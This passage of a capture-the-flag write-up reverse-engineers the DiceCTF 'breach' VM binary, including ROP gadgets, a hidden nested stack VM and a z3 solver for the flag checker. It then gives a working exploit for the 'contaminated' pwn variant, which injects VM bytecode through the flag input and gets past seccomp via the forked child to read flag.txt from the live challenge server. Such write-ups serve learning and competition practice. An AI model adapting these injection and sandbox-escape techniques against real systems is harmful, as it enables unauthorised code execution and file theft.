.munchanged ; offset 0x10
.munchanged ; offset 0x18 // r13
.mlibc 0x4a550 ; pop rax ; ret
.mlibc 0x25679 ; ret
.mlibc 0x7b0cb ; mov r10, rdx ; jmp rax
.mlibc 0x11fdaa ; mov r8, rbx ; mov rax, r8 ; pop rbx ; ret
.munchanged ; offset 0x40
.mlibc 0x4a550 ; pop rax ; ret
.munchanged ; offset 0x50 // r8
.mlibc 0x26b72 ; pop rdi ; ret
.munchanged ; offset 0x60 // r9
.mlibc 0x27529 ; pop rsi ; ret
.munchanged ; offset 0x70 // r10
.mlibc 0x1056fd ; pop rdx ; pop rcx ; pop rbx ; ret
.munchanged ; offset 0x80 // r11
.munchanged ; offset 0x88
.munchanged ; offset 0x90
// (x86) = (VM)
// rax = r8
// rdi = r9
// rsi = r10
// rdx = r11
// r10 = r12
// r8 = r13
.mlibc 0x66229 ; syscall
.mlibc 0x331ff ; pop rbx ; ret
.mexe 0x140a0 // ®isters[8]
// Set VM's r8 to the result of the syscall
.mlibc 0x162d94 ; mov qword ptr [rbx], rax ; pop rax ; pop rdx ; pop rbx ; ret
.mraw 0x0
.mraw 0x0
.mraw 0x0
.magicend
From all of this we can now label this function and data
labels[0x2353] = 'syscall'
labels[0x287b] = 'ROP_syscall'
But considering there are 18 of these calls, we can probably solve a bunch of time with adding a comment for each call to syscall
with the name of the system call.
The first thing we need to do is build a dictionary which turns the ‘rax’ register into the syscall name
syscall_names = dict([(
int(getattr(constants.linux.amd64,v)),v)
for v in dir(constants.linux.amd64) if v.startswith('SYS_')
])
We’ll also make use an artifical instruction again
CallSyscall = namedtuple('CallSyscall', ['addr', 'target', 'syscall'])
Then finally the pass, first we find a call then look back through the last 10 instructions in reverse for an immediate move into r8
(not perfect but haven’t seen it fail with this code)
def pass_syscall_inst(instructions):
total_instructions = len(instructions)
for idx, instruction in enumerate(instructions):
match instruction:
case Call(addr=addr, target=0x2353):
for prev_inst in reversed(instructions[max(0,idx-10):idx]):
match prev_inst:
case MovImm(reg=8, imm=imm):
instructions[idx] = CallSyscall(addr, 0x2353, imm)
break
Then finally adding it to dump
to show this in a comment
case CallSyscall(addr, target, syscall):
print(f'\tcall {labels[target]} ; {syscall_names[syscall]}')
print()
Looking at the difference afterwards it makes a massive difference in better understanding this disassembled code, especially when the function is so heavily used.
Before | After |
mov r8, 0x16 mov r9, rexe mov r0, 0x6060 add r9, r0 call FUNC_2353 |
mov r8, 0x16 mov r9, rexe mov r0, 0x6060 add r9, r0 call syscall ; SYS_pipe |
Walking through the code
Let’s go back to this post-init
code, and hopefully we can see how clear it is now
call init
mov r8, 0x16
mov r9, rexe
mov r0, 0x6060 // &mem[0x2000]
add r9, r0
call syscall ; SYS_pipe
mov r8, 0x16
mov r9, rexe
mov r0, 0x6068 // &mem[0x2008]
add r9, r0
call syscall ; SYS_pipe
mov r8, 0x39
call syscall ; SYS_fork
// If child goto child_program
mov r0, 0x0
jumpeq r8, r0, child_program // Was LAB_19e
// If parent goto parent_program
jump parent_program // Was LAB_126
Looking at both child_program
and parent_program
they both call FUNC_2093
with what a look like a paremter in r8
so let’s take a look at it
FUNC_2093:
mov r0, r8
mov r0, mem[r0]
mov r1, 0xffffffff
and r0, r1
mov r8, 0x3
mov r9, r0
call syscall ; SYS_close
ret
It looks like this dereferences a pointer then calls close
on it, just below this we can see FUNC_20da
does the same thing except it has the file descriptor in r8
, so they can be renamed to close_ptr
and close
Follwoing the parent path
parent_program:
// Close the first pipe in the pipes at 0x2000
mov r8, 0x2000
call close_ptr
// Close the second pipe in the pipes stored at 0x2008
mov r8, 0x200c
call close_ptr
call init_seccomp // Was FUNC_223d
jump parent_program_cont // Was LAB_1dbd
I won’t dig into the init_seccomp
as it’s not necessary to solve this, when treating this as a pwn challenge for contaminated CTF (reuses this binary) it might be become more relevant.
Now the juice of it is primarily in parent_program_cont
parent_program_cont:
// Get the second fd from the first pipe and store it in mem[0x2010]
mov r0, 0x2004
mov r0, mem[r0]
mov r1, 0xffffffff
and r0, r1
mov r1, 0x2010
store mem[r1], r0
// Get the first fd in the second pipe and store it in mem[0x2018]
mov r0, 0x2008
mov r0, mem[r0]
mov r1, 0xffffffff
and r0, r1
mov r1, 0x2018
store mem[r1], r0
// Get 'rom' address (0x140e0 is bytecode pointer)
mov r8, 0x140e0
add r8, rexe
call read_ptr // was FUNC_23cb
// Store the rom address in mem[0x2020]
mov r1, 0x2020
store mem[r1], r8
get_flag: // was LAB_1e34
mov r8, DAT_2bf6 ; 0x2bf6 // "Flag:"
mov r9, DAT_2bfc ; 0x2bfc // End of "Flag:" ... Start of "Checking"
call write_stdout // was FUNC_2463
mov r8, 0x0 // SYS_read
mov r9, 0x0 // fd = stdin
mov r0, 0x2020
mov r10, mem[r0] // buf = rom address
mov r11, 0x60 // count
call syscall ; SYS_read
// If one byte was written (aka new line) then exit
mov r0, 0x1
jumpeq r8, r0, exit_parent // LAB_2085
// Store the number of bytes written into mem[0x2028]
mov r1, 0x2028
store mem[r1], r8
/// send a count of th ebytes the user entered
mov r8, 0x1 // SYS_write
mov r0, 0x2010
mov r9, mem[r0] // fd = second fd of first pipe
mov r10, rexe
mov r0, 0x6088
add r10, r0 // buf = &mem[0x2028] (number of bytes written)
mov r11, 0x8 // size = 0x8
call syscall ; SYS_write
/// send the bytes the user entered
mov r8, 0x1 // SYS_write
mov r0, 0x2010
mov r9, mem[r0] // fd = second fd of first pipe
mov r0, 0x2020
mov r10, mem[r0] // buf = rom address (where the flag was written)
mov r1, 0x2028
mov r11, mem[r1] // size = number of bytes read
call syscall ; SYS_write
// Write "Checking...."
mov r8, DAT_2bfc ; 0x2bfc // "Checking..."
mov r9, DAT_2c08 ; 0x2c08 // end of "Checking..."
call write_stdout // was FUNC_2463
/// read a byte back from the user
mov r8, 0x0 // SYS_read
mov r0, 0x2018
mov r9, mem[r0] // fd = first fd in the second pipe
mov r0, 0x2020
mov r10, mem[r0] // buf = rom address
mov r11, 0x1 // size = 1
call syscall ; SYS_read
/// read from the start of the rom address
mov r0, 0x2020
mov r8, mem[r0]
call read_ptr // was FUNC_23cb
// Cast the read to a byte and check if it's one
mov r0, 0xff
and r8, r0
// If the result was 1 then
mov r0, 0x1
jumpeq r8, r0, LAB_2054
mov r8, DAT_2c08 ; 0x2c08 // "Wrong"
mov r9, DAT_2c0f ; 0x2c0f
call write_stdout // was FUNC_2463
jump get_flag // was LAB_1e34
LAB_2054:
mov r8, DAT_2c0f ; 0x2c0f // "Correct!"
mov r9, 0x2c18
call write_stdout // was FUNC_2463
LAB_2085:
ret
So from this we can see that it reads and writes between pipes which the child is going to be using to validate and will send back 1 when it is a valid flag.
Following the child path
We can see up-front that like the parent it closes the other half of the pipe fd’s and also closes stdin and stdout
child_program:
mov r8, 0x2004
call close_ptr
mov r8, 0x2008
call close_ptr
mov r8, 0x0
call close
mov r8, 0x1
call close
jump child_program_cont // was LAB_375
child_program_cont:
// Get the second fd from the second pipe and store it in mem[0x2010]
mov r0, 0x200c
mov r0, mem[r0]
mov r1, 0xffffffff
and r0, r1
mov r1, 0x2010
store mem[r1], r0
// Get the first fd from the first pipe and store it in mem[0x2018]
mov r0, 0x2000
mov r0, mem[r0]
mov r1, 0xffffffff
and r0, r1
mov r1, 0x2018
store mem[r1], r0
// Get 'rom' address (0x140e0 is bytecode pointer)
mov r8, 0x140e0
add r8, rexe
call read_ptr
// Store the address of the 'rom' pointer in mem[0x2020]
mov r1, 0x2020
store mem[r1], r8
call FUNC_247
...
Before going too deep down this path there is a very important function involved here FUNC_247
which will change what the printreg instructions end up doing
patch_printreg: // was FUNC_247
mov r8, 0xa // SYS_mprotect
mov r9, 0x1000
add r9, rexe // start = exe+0x1000
mov r10, 0x2000 // len = 0x2000
mov r11, 0x7 // prot = PROT_READ | PROT_WRITE | PROT_EXEC
call syscall ; SYS_mprotect
// Calculate the absolute address of the DAT_2a23 in memory and store it in r9
mov r0, 0x2020
mov r1, mem[r0]
mov r0, DAT_2a23 ; 0x2a23
add r1, r0
mov r9, r1
// Address to store the data, exe+0x1a00 is just after .text and before .rodata
mov r8, 0x1a00
add r8, rexe
// Calculate the size of DAT_2a23 and divide it by 8 (>> 3)
mov r1, str_flag ; 0x2bf6
mov r0, DAT_2a23 ; 0x2a23
sub r1, r0
mov r0, 0x3
shr r1, r0
mov r10, r1
// dst/r8=exe+0x1a00
// src/r9=absolute address of DAT_2a23
// size/r10=sizeof(DAT_2a23)/8
call memcpy_qword // was FUNC_2112
// Overwrite the instruction switch jump table entry for printreg(10)
// with the address of 0x1a00, because this writes a pointer size and
// the jump table is int it must write two entries so it writes to
// the entry of 9 and 10 simultanously keeping the value of 9 unchanged
mov r9, 0xfffff9bcfffff7c8
mov r8, 0x2068
add r8, rexe
call write_ptr
mov r8, 0xa // SYS_mprotect
mov r9, 0x1000
add r9, rexe // start
mov r10, 0x2000 // length
mov r11, 0x5 // proto = PROTO_READ | PROTO_EXEC
call syscall ; SYS_mprotect
ret
The rabbit hole deepens as you can see, this changes what the printreg
instruction does to be instead what’s hidden in the assembly of DAT_2a23
.
Examining the printreg patching
In order to more easily understand what the code in DAT_2a23
does let’s open breach.bin
in Ghidra set the language to x86:LE:default:gcc
, don’t let it analyze the code, we know exactly what we want and from where
The important code we want is at 0x2a23 and we want it to be treated as though it’s at the address 0x101a00 to more easily relate it to the executable code.
In order to do this in Window -> Memory Map you can click “Move” and provide 0xFEFDD
for the start address which is 0x101a00 - 0x2a23
.
In order to make things a little easier we will also add an uninitialized block that will cover enough space for us to define existing variables and types so I create a new block called postblock
which starts at 0x101bf5
and has a length of 0x10000
After this is adjusted now you can go to the address of 0x00101a00
which should match the file 0x2a23
and press D to disassemble, and we can start seeing what it does.
We can see that it starts with
00101a00 CALL FUN_00101a0a
00101a05 JMP LAB_0010193b
If you look at 0x0010193b
in breach you’ll see it’s the continuation of the loop, so FUN_00101a0a
is the core of this.
Let’s do some initial house keeping and setup some types to match the binary | address | name | type | | ——- | —- | —- | | 00104040 | inst_offset | long | | 001140e0 | bytecode | byte* | | 00104060 | mem | long[0x2000] (byte[65536] but we bypass that) | | 00114060 | registers | long[16] |
Now let’s look at how the decompilation looks
void FUN_00101a0a(void)
{
byte bVar1;
ulong in_RCX;
byte bVar2;
bVar1 = (bytecode + inst_offet)[1];
bVar2 = bytecode[inst_offet] >> 4;
if (bVar2 == 0) {
*(undefined *)((long)mem + mem[1536]) =
*(undefined *)((long)registers + (in_RCX & 0xffffffffffffff00 | (ulong)(byte)(bVar1 << 3) ))
;
mem[1536] += 1;
}
else if (bVar2 == 1) {
*(byte *)((long)mem + mem[1536]) = bVar1;
mem[1536] += 1;
}
else if (bVar2 == 2) {
(&DAT_0010405e)[mem[1536]] = (&DAT_0010405f)[mem[1536]] + (&DAT_0010405e)[mem[1536]];
mem[1536] += -1;
}
else if (bVar2 == 3) {
(&DAT_0010405e)[mem[1536]] = (&DAT_0010405f)[mem[1536]] * (&DAT_0010405e)[mem[1536]];
mem[1536] += -1;
}
else if (bVar2 == 4) {
(&DAT_0010405e)[mem[1536]] = (&DAT_0010405f)[mem[1536]] ^ (&DAT_0010405e)[mem[1536]];
mem[1536] += -1;
}
else if (bVar2 == 5) {
(&DAT_0010405f)[mem[1536]] = (&DAT_0010405f)[mem[1536]] == '\0';
}
else if (bVar2 == 6) {
(&DAT_0010405e)[mem[1536]] = (&DAT_0010405f)[mem[1536]] & (&DAT_0010405e)[mem[1536]];
mem[1536] += -1;
}
else if (bVar2 == 7) {
*(ulong *)((long)registers + (in_RCX & 0xffffffffffffff00 | (ulong)(byte)(bVar1 << 3))) =
(ulong)(byte)(&DAT_0010405f)[mem[1536]];
mem[1536] += -1;
}
else if (bVar2 == 8) {
mem[1536] = 0x3008;
}
inst_offet = inst_offet + 2;
return;
}
It’s a bit of a mess, but gives a reasonable clue what is going on, remember any operations on mem
you need to multiply by 8
to get the real value as we are using long
not the original byte
, it looks like the second nibble of the printreg
instruction defines these other sub instructions.
There appears to be a stack offset which is stored in mem[1536]
(0x2000 in real mem
array) unfortunately the generated code doesn’t identify that DAT_0010405f
is really one below that stack and DAT_0010405e
is two below the stack
Everything works solely on the stack pushing values then do an operation which pops the values and performs them (a different VM, hidding inside the VM)
op | instruction |
---|---|
0 | ex.push reg |
1 | ex.push imm |
2 | ex.add |
3 | ex.mul |
4 | ex.xor |
5 | ex.eqz |
6 | ex.and |
7 | ex.pop reg |
8 | ex.reset |
Now that we have these we can ditch the printreg
instruction and add these new instructions.
ExPushReg = namedtuple('ExPushReg', ['addr', 'reg'])
ExPushImm = namedtuple('ExPushImm', ['addr', 'imm'])
ExAdd = namedtuple('ExAdd', ['addr'])
ExMul = namedtuple('ExMul', ['addr'])
ExXor = namedtuple('ExXor', ['addr'])
ExEqz = namedtuple('ExEqz', ['addr'])
ExAnd = namedtuple('ExAnd', ['addr'])
ExPop = namedtuple('ExPop', ['addr', 'reg'])
ExReset = namedtuple('ExReset', ['addr'])
Then we adjust the parsing to handle it
def parse(...):
...
case 10:
inst = buffer[offset] >> 4
other = buffer[offset+1]
match inst:
case 0:
instructions.append(ExPushReg(offset, other))
case 1:
instructions.append(ExPushImm(offset, other))
case 2:
instructions.append(ExAdd(offset))
case 3:
instructions.append(ExMul(offset))
case 4:
instructions.append(ExXor(offset))
case 5:
instructions.append(ExEqz(offset))
case 6:
instructions.append(ExAnd(offset))
case 7:
instructions.append(ExPop(offset, other))
case 8:
instructions.append(ExReset(offset))
offset += 2
Now we just need to print them in the dump
case ExPushReg(addr, reg):
print(f'\tex.push {reg_names[reg]}')
case ExPushImm(addr, imm):
print(f'\tex.push 0x{imm:x}')
case ExAdd(addr):
print(f'\tex.add')
case ExMul(addr):
print(f'\tex.mul')
case ExXor(addr):
print(f'\tex.xor')
case ExEqz(addr):
print(f'\tex.eqz')
case ExAnd(addr):
print(f'\tex.and')
case ExPop(addr,reg):
print(f'\tex.pop {reg_names[reg]}')
case ExReset(addr):
print(f'\tex.reset')
Well that was a bit of a side-track discovered, a bunch more instructions getting closer to the finish now.
Let’s keep walking down the child function
child_loop: // was LAB_40b
/// Read 8 bytes from the pipe into the rom start
mov r8, 0x0
mov r0, 0x2018
mov r9, mem[r0]
mov r0, 0x2020
mov r10, mem[r0]
mov r11, 0x8
call syscall ; SYS_read
// Read the pointer/size from the start of the rom
mov r0, 0x2020
mov r8, mem[r0]
call read_ptr
// Read the flag data into the start of the rom
mov r11, r8
mov r8, 0x0
mov r0, 0x2018
mov r9, mem[r0]
mov r0, 0x2020
mov r10, mem[r0]
call syscall ; SYS_read
call check_flag // was FUNC_557
// Write the result of check_flag (r8) into the start of the rom
mov r9, r8
mov r0, 0x2020
mov r8, mem[r0]
call write_ptr
// Write the result back to the parent to read
mov r8, 0x1
mov r0, 0x2010
mov r9, mem[r0]
mov r0, 0x2020
mov r10, mem[r0]
mov r11, 0x1
call syscall ; SYS_write
jump child_loop
Now the real part where we want to look check_flag
check_flag:
// Check if the rom (flag input) starts with 'dice{'
mov r0, 0x0
mov r8, rom[r0]
mov r0, 0xffffffffff
and r8, r0
mov r0, 0x7b65636964 // '{ecid'
jumpeq r8, r0, LAB_589
jump LAB_1da6
LAB_589:
ex.reset
// Load flag offsets
mov r0, 0x7
mov r8, rom[r0]
mov r0, 0x1
mov r9, rom[r0]
mov r0, 0x11
mov r10, rom[r0]
mov r0, 0xf
mov r11, rom[r0]
// Add (can be another op) the first two values
ex.push r8
ex.push r9
ex.add
// Add (can be another op) the last result to 0x2c
ex.push 0x2c
ex.add
// Add (can be another op) the second two values
ex.push r10
ex.push r11
ex.add
// Xor (can be another op) the last result and 0xd8
ex.push 0xd8
ex.xor
// Xor the last two groups of operations
ex.xor
// Xor the result of the last operation with 0xd8
ex.push 0x10
ex.xor
// Xor the result of that again
ex.push 0xd6
ex.xor
// Check if it's equal to zero (this only happens if it equals 0xd6)
ex.eqz
... // slightly different ops, constants and offsets in mem provided and repeated multiple times
ex.and // Combine the result of the final eqz operations
ex.and
ex.and
ex.and
ex.and
... // repeated and for each block
ex.pop r8 // Return the result as r8
jump LAB_1daf
LAB_1da6:
mov r8, 0x0
LAB_1daf:
ret
Solving the flag checker
Now we can build another matcher which is able extract all these patterns and then use z3 to be able to solve what matches all these operations.
def solve(instructions):
flag = [BitVec('f%d' % i, 8) for i in range(100)]
def do_op(op, a, b):
match op:
case ExAdd():
return a + b
case ExMul():
return a * b
case ExXor():
return a ^ b
case ExAnd():
return a & b
case _:
raise Exception('Unexpected operation')
ops = []
idx = 0
while idx < len(instructions):
match instructions[idx:idx+24]:
case [MovImm(imm=a), RomLoad(), MovImm(imm=b), RomLoad(),
MovImm(imm=c), RomLoad(), MovImm(imm=d), RomLoad(),
ExPushReg(), ExPushReg(),
(ExAdd() | ExMul() | ExXor() | ExAnd()) as op0,
ExPushImm(imm=r0),
(ExAdd() | ExMul() | ExXor() | ExAnd()) as op1,
ExPushReg(), ExPushReg(),
(ExAdd() | ExMul() | ExXor() | ExAnd()) as op2,
ExPushImm(imm=r1),
(ExAdd() | ExMul() | ExXor() | ExAnd()) as op3,
(ExAdd() | ExMul() | ExXor() | ExAnd()) as op4,
ExPushImm(imm=r2),
(ExAdd() | ExMul() | ExXor() | ExAnd()) as op5,
ExPushImm(imm=expected),
ExXor(),
ExEqz(),
]:
result1 = do_op(op0, flag[a], flag[b])
result1 = do_op(op1, result1, r0)
result2 = do_op(op2, flag[c], flag[d])
result2 = do_op(op3, result2, r1)
result = do_op(op4, result1, result2)
result = do_op(op5, result, r2)
ops.append(result == expected)
idx += 1
s = Solver()
s.add(z3.And(ops))
assert s.check() == sat
m = s.model()
print(bytes([m[x].as_long() for x in flag if m[x] != None]), file=sys.stderr)
This gives us the flag dice{st4ying_ins1de_vms_1s_0verr4ted}
Exploiting the flag input for remote code execution
Script: exploit.py
This is the contaminated pwn challenge which reuses this same binary, as mentioned earlier the read()
writes to the start of the ROM, so it’s possible to overwrite the code for after it returns from the parent code, in order to simplify writing this exploit I made use of pwninit to get working outside of Docker.
The read()
only consumes 0x60
bytes, which is not really enough for us to fully exploit what we need, on top of this the location which it starts at is 0x28
so we have an option to jump around these address to try and have as much code as possible or fit it all in the 0x38
(0x28-0x60
)
The first thing we need to start writing this exploit is some helpers to make it easier for crafting our own VM code
def mov_imm(r, imm):
return bytes((1 | (r << 4),)) + p64(imm)
def mov_reg(r1, r2):
return bytes((2, r1 | (r2 << 4)))
def add(r1, r2):
return bytes((3 | (0 << 4), r1 | (r2 << 4)))
def sub(r1, r2):
return bytes((3 | (1 << 4), r1 | (r2 << 4)))
def mov_to_mem(r1, r2):
return bytes((4, r1 | (r2 << 4)))
def mov_from_mem(r1, r2):
return bytes((5, r2 | (r1 << 4)))
def jump_imm(imm):
return bytes((7,)) + p64(imm)
def print_reg(r):
return bytes((10, r))
def halt():
return bytes((0, ))
def call(in_payload, addr):
ret = len(in_payload)+9+2+9+2+9
payload = mov_imm(0, 8)
payload += sub(15, 0)
payload += mov_imm(0, ret)
payload += mov_to_mem(15, 0)
payload += jump_imm(addr)
assert len(payload) + len(in_payload) == ret
return payload
def syscall(payload):
return call(payload, 0x2353)
Now let’s form an initial payload to be sent, in order to keep this within the desired size instead of doing a normal call instruction and jump I make the jump instead of the return of get_flag
and then on top of that to reduce the need for more mov mem[dst], src
instructions which are 9
bytes I use that same value as the size which gets patched into the read from stdin into the ROM.
def initial_payload():
# Patches stdin read size for the flag from:
# 0x1e82: mov r11, 0x60
# into
# 0x1e82: mov r11, 0x1e34
# Payload to get a larger buffer
# assuming r0 ix 0x8 -- it gets set to 0 from the pervious ret
payload = b'A' * 0x28
# Get the address of the rom
payload += mov_imm(14, 0x02020)
payload += mov_from_mem(14, 14)
# address where the size of the read is within the parent
payload += mov_imm(8, 0x1e83)
payload += add(8, 14)
# Setup a fake stack frame to return into 0x8
payload += sub(15, 0)
payload += mov_to_mem(15, 0)
# Setup a second stack frame to return into get_flag (0x1e34)
# additionally use this as the same value to be store
payload += sub(15, 0)
payload += mov_imm(9, 0x1e34)
payload += mov_to_mem(15, 9)
# jump to write_ptr
payload += jump_imm(0x2417)
assert len(payload) < 0x60
return payload
Once this is setup we need to send it then send an empty line so that it attempts to exit the program for where this code runs, when it finally executes it will end up back in the get_flag
loop, so won’t actually exit, but this flag will now fetch 0x1e34
bytes
io.sendlineafter(b'Flag', initial_payload())
io.sendlineafter(b'Flag', b'')
Now that we have the ability to send a much bigger payload, you might remember the mention of seccomp earlier, the payload that it is setting up limits syscalls only to read
, write
, exit
unfortunately we need to read flag.txt
which isn’t open so we need the ability to call open
, thankfully the fork doesn’t have these same restrictions.
Additionally the child does not break out of it’s loop, so we need to modify it’s loop from child_loop
/0x40b
to run the code we want on the client, at the same time this same code is added to the client, so it’s one big payload used for both the parent and the child which needs to:
- Get the flag on the child
- Send the flag from the child to the parent
- Receive the flag on the parent
- Send teh flag to stdout
def full_payload():
# Starting at 8 bytes in because that's the return address
payload = b'A'*8
################
#### PARENT CODE
################
###
# read( child, &mem[0], 100 )
payload += mov_imm(8, 0) # SYS_read
# fd = child pipe
payload += mov_imm(0, 0x2018)
payload += mov_from_mem(9, 0)
# buffer = &mem[0x0000]
payload += mov_imm(10, 0x4060) # &mem[0x0000]
payload += add(10, 3) # + exe base
# count
payload += mov_imm(11, 100)
payload += syscall(payload)
##
# puts( &mem[0] )
payload += mov_imm(8, 1) # SYS_write
payload += mov_imm(9, 1) # stdout
# buffer = &mem[0x0000]
payload += mov_imm(10, 0x4060) # &mem[0x0000]
payload += add(10, 3) # + exe base
# count
payload += mov_imm(11, 100)
payload += syscall(payload)
payload += halt()
################
#### CHILD CODE
################
child_start = len(payload)
###
# open('flag.txt', 0, 0 )
# store 'flag.txt\x00' in mem[0]
payload += mov_imm(0, u64(b'flag.txt'))
payload += mov_imm(1, 100)
payload += mov_to_mem(1, 0)
payload += mov_imm(0, 100)
payload += mov_imm(1, 8)
payload += mov_to_mem(1, 0)
payload += mov_imm(8, 2) # SYS_open
# filename = &mem[0]
payload += mov_imm(9, 0x4060+100) # &mem[0x0000]
payload += add(9, 3) # + exe base
payload += mov_imm(10, 0) # flags
payload += mov_imm(10, 0) # mode
payload += syscall(payload)
###
# sendfile( child, flag_file, 0, 100 )
payload += mov_reg(10, 8) # in_fd
payload += mov_imm(8, 40) # SYS_sendfile
# out_fd = pipe
payload += mov_imm(0, 0x2010)
payload += mov_from_mem(9, 0)
payload += mov_imm(11, 0) # offset
payload += mov_imm(12, 100) # size
payload += syscall(payload)
payload += halt()
assert len(payload) < 0x40b
payload += b'B' * (0x40b - len(payload))
assert len(payload) == 0x40b # child_loop
# Jump to the start of the child code, we do this instead of putting all the child payload here
# and it potentially getting too long that it ends up in two read()'s from stdin
payload += jump_imm(child_start)
return payload
Finally we send this payload and wait for the flag to magically appear
io.sendlineafter(b'Flag', full_payload())
io.sendlineafter(b'Flag', b'')
print(io.recvall())
io.wait()
And the we get the final output
[*] '/home/kali/Downloads/breach/breach_patched'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'.'
[+] Opening connection to mc.ax on port 31618: Done
payload length 1044
[+] Receiving all data: Done (102B)
[*] Closed connection to mc.ax port 31618
b': dice{th4nk_y0u_for_expl0it1ng_my_3xpl0it_:)}\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
It includes all the extra 0’s because we read and write 100 bytes, even though it’s not that long, but the final flag for this is dice{th4nk_y0u_for_expl0it1ng_my_3xpl0it_:)}